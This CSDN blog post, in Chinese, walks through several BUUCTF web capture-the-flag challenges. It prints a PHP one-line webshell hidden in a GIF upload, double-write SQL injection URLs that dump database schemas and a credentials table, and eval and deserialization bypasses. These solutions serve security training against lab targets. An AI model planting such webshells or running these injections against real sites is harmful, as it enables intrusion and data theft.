BUUCTF web

最新推荐文章于 2025-03-02 18:16:28 发布
最新推荐文章于 2025-03-02 18:16:28 发布
阅读量317 收藏
点赞数
文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74228275/article/details/131715836
版权
本文详述了一系列Web安全挑战,包括利用图片上传功能插入恶意脚本,通过蚁剑获取flag,解决SQL注入问题,安装dirsearch工具,以及在不同场景下找出解题策略,如弱比较、文件包含和代码执行等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

[极客大挑战 2019]Upload

[ACTF2020 新生赛]Upload 

[极客大挑战 2019]BabySQL

​编辑 

 [极客大挑战 2019]PHP

 dirsearch的安装

[ACTF2020 新生赛]BackupFile 

[RoarCTF 2019]Easy Calc

​编辑 [极客大挑战 2019]BuyFlag

[极客大挑战 2019]Upload

先上传一个图片,图片内容为

GIF89a? <script language="php">eval($_REQUEST[111])</script>

 然后连接蚁剑,得到flag

[ACTF2020 新生赛]Upload 

和上一题一样

[极客大挑战 2019]BabySQL

试试万能密码,发现不行

 

 试试双写

 发现可以,这题应该就是要双写。

/check.php?username=admin&password=1 ' oorrder bbyy 4 %23

 /check.php?username=admin&password=1 ' ununionion seselectlect 1,2,database() %23

 

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

 

/check.php?username=admin&password=1 ' uunionnion sselectelect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23 

 

/check.php?username=admin&password=1 ' uunionnion sselectelect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' %23 

 

/check.php?username=-1&password=1234' uunionnion sselectelect 1,database(),group_concat(id,username,passwoorrd) frfromom b4bsql;%23 

 

 [极客大挑战 2019]PHP

访问www.zip,得到一个压缩文件,打开index.php,得到一串代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
<?php
 
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
 
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));
 
?>

 

 dirsearch的安装

先进入超级用户

sudo su

然后更新

apt-get update

我在更新时,一直在报错

 执行下面命令

wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2022.1_all.deb --no-check-certificate

apt install ./kali-archive-keyring_2022.1_all.deb 

然后在更新。

之后执行

apt-get install dirsearch

[ACTF2020 新生赛]BackupFile 

使用下面的命令

dirsearch -u url

 访问一下这个文件

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

是一个弱比较,只需要构造key等于123即可。

[RoarCTF 2019]Easy Calc

查看页面源代码,发现一个calc.php,访问一下,得到

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

上面显示了一些黑名单,没过滤字母和数字。

?num=print_r(scandir(chr(47)))

 

?num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)) 

 [极客大挑战 2019]BuyFlag

查看页面源代码,点击一下pay.php

 得到

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

需要传入money和password两个参数。password==404,password必须是字符串

money=100000000.

我们还需要变成这个cuit

将cookie里的user改为1,传入post参数:password=404aa&money=100000000,提示money的长度太长。

参考[极客大挑战 2019]BuyFlag_HasntStartIsOver的博客-CSDN博客

传入参数password=404aa&money[]=1

 

Buuctf Web题解
weixin_68029979的博客
04-24 1920
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
Buuctf web Php(网站备份+代码审计)
2401_86312572的博客
12-31 1157
但现在还有一个问题,就是反序列操作完成后会自动执行_wakeup这个代码,修改username值,导致在下面的if语句中被拦截,拿不到flag。因此我们需要修改序列的总属性量,改为比原有属性要大的数,这就会触发一个反序列漏洞,导致代码逻辑异常,自动略过_wakeup,有点像卡bug。private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。里面是一个虚假的flag,但是我们可以猜测,真正的网站上flag.php中有真正的flag。字符串长度也包括所加前缀的长度。
BUUCTF Web 题解
duwgv的博客
03-02 887
在最下面出现了一串代码,它告诉我们,将cat == dog就给我们回显类似于flag的东西。这时想到file传入参数为flag.php,flag大概被隐藏在该文件中,试一下php伪协议。可以有文件显示,说明这大概是个Linux系统,那就来找一下,flag文件。有个$a 变量,这个可以用变量覆盖,但有的不行。进去后给我们一个这样的笑脸,也是什么都没有,同样看页面的源代码。来ping一下本机,发现可以,然后看看分号还可以用不。这个可以代表空格,但不是唯一,可以去查一下。这里可以看出,是单引号闭合。
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 5万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF web Upload
2301_79555897的博客
09-04 463
使用蚁剑连接,这里需要猜测上传文件路径,最终路径后面改为。但是有个提醒,弹窗警告,说明前端做了过滤,有两种思路。搜索javascript,关闭即可。上传有关的就先写一个简单的木马,一句话木马。和上一题一样,我这里直接用的的上一个的文件。会到靶机页面,刷新后继续上传即可。不是图片格式,用bp抓包,改消息头。密码为 a 密码为自己设定的。在文件根目录下找到flag。利用bp更改后缀为phtml。在根目录后面找flag就行。直接利用蚁剑连接后缀为。蚁剑连接,url后缀。
buuctf web
个人笔记
02-19 3656
ctf web
BUUCTF Web
2301_80131237的博客
02-18 436
此段注释的php代码意思是从url中获取名为cat的值并将其赋值给$cat变量,然后输出$cat,如果$cat的值为dog的话,那么就会输出一段内容。cat=dog /:绝对路径从根目录下开始?:分隔路径和查询参数。成功登录获得flag{5b6d3733-4b3a-415a-9f64-65253c4a8a08}获得flag{7d958f9f-dfc0-48cc-955c-a8e89c862dd8}密码使用万能密码:1' or 1=1 -- -用户名随意输入admin。
BUUCTF WEB BabySql
qq_41696858的博客
09-03 356
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
BUUCTF WEB SHRINE
qq_41696858的博客
12-23 449
依然是经典代码审计: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @ app.route('/') def index(): return open(__file__).read() @ app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace(
BUUCTF web 系列详解 (详细版)持续更新中
llki666的博客
12-27 3304
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其中的问号位置之前的子串。
BUUCTF WEB phpweb1
qq_41696858的博客
12-14 354
打开场景,我惊了,我是你哥哥!!!!!! 好吧,直观的感受。这个页面一直在刷新,搞不好是什么js脚本,看看源码,发现了两个hidden参数 而搜索了页面上warning后,很确定前端请求了后端的date函数,所以页面一直在更新,而且格式有错误 既然我们可以在前端调用后端函数,那么为什么不试试其他函数呢 直接尝试eval,发现有过滤 行吧,试试其他的file_get_contents,没被过滤 于是第一payload: func=file_get_contents&p=index.php 得到了ind
BUUCTF web(九)
m0_46616663的博客
08-29 1298
BUUCTF刷题笔记
BUUCTF WEB(12月刷题~)
A_dmin的博客
01-21 2209
BUUCTF WEB [RoarCTF 2019]Easy Java BUUCTF WEB [0CTF 2016]piapiapia BUUCTF WEB [CISCN2019 华北赛区 Day1 Web1]Dropbox BUUCTF WEB [CISCN2019 华北赛区 Day1 Web2]ikun BUUCTF WEB [BUUCTF 2018]Online Tool BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei BUUCTF WEB shrine
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8683
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
C2000系列DSP芯片串口读写方案与FlashPro2000编程器应用详解
04-27
内容概要:本文详细介绍了基于TMS320F系列芯片的C2000串口读写方案及其编程器——FlashPro2000的功能特点和支持的接口模式。文中不仅涵盖了硬件连接的具体步骤,还提供了代码实例来展示Flash擦除操作,并对比了JTAG和SCI-BOOT两种模式的优缺点。此外,针对不同型号的C2000系列芯片,给出了详细的适配指导以及避免烧录过程中可能出现的问题的方法。 适合人群:从事DSP开发的技术人员,尤其是对TI公司C2000系列芯片有一定了解并希望深入了解其编程和烧录细节的人群。 使用场景及目标:适用于实验室环境下的程序调试阶段,以及生产线上的批量烧录任务。主要目的是帮助开发者选择合适的编程工具和技术手段,提高工作效率,减少因误操作导致设备损坏的风险。 其他说明:文中提供的代码片段和命令行指令可以直接用于实际项目中,同时附带了一些实用技巧,如防止芯片变砖的小贴士和自动化重试脚本,有助于解决常见的烧录难题。
汉字字库存储芯片扩展实验通常是为了学习和理解如何在嵌入式系统或计算机硬件中增加或管理存储资源,特别是针对需要处理中文字符的应用 这类实验对于想要深入了解计算机体系结构、嵌入式开发以及汉字编码的学生和工
04-27
汉字字库存储芯片扩展实验 # 汉字字库存储芯片扩展实验 ## 实验目的 1. 了解汉字字库的存储原理和结构 2. 掌握存储芯片扩展技术 3. 学习如何通过硬件扩展实现大容量汉字字库存储 ## 实验原理 ### 汉字字库存储基础 - 汉字通常采用点阵方式存储(如16×16、24×24、32×32点阵) - 每个汉字需要占用32字节(16×16)到128字节(32×32)不等的存储空间 - 国标GB2312-80包含6763个汉字,需要较大存储容量 ### 存储芯片扩展方法 1. **位扩展**:增加数据总线宽度 2. **字扩展**:增加存储单元数量 3. **混合扩展**:同时进行位扩展和字扩展 ## 实验设备 - 单片机开发板(如STC89C52) - 存储芯片(如27C256、29C040等) - 逻辑门电路芯片(如74HC138、74HC373等) - 示波器、万用表等测试设备 - 连接线若干 ## 实验步骤 ### 1. 单芯片汉字存储实验 1. 连接27C256 EPROM芯片到单片机系统 2. 将16×16点阵汉字字库写入芯片 3. 编写程序读取并显示汉字 ### 2. 存储芯片字扩展实验 1. 使用地址译码器(如74HC138)扩展多片27C256 2. 将完整GB2312字库分布到各芯片中 3. 编写程序实现跨芯片汉字读取 ### 3. 存储芯片位扩展实验 1. 连接两片27C256实现16位数据总线扩展 2. 优化字库存储结构,提高读取速度 3. 测试并比较扩展前后的性能差异 ## 实验代码示例(单片机部分) ```c #include <reg52.h> #include <intrins.h> // 定义存储芯片控制引脚 sbit CE = P2^7; // 片选 sbit OE = P2^6; // 输出使能 sbit
测控装备干扰源快速侦测系统设计研究.pdf
最新发布
04-27
测控装备干扰源快速侦测系统设计研究.pdf
嵌入式八股文面试题库资料知识宝典-【开发】嵌入式开源项目&库&资料.zip
04-27
嵌入式八股文面试题库资料知识宝典-【开发】嵌入式开源项目&库&资料.zip
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值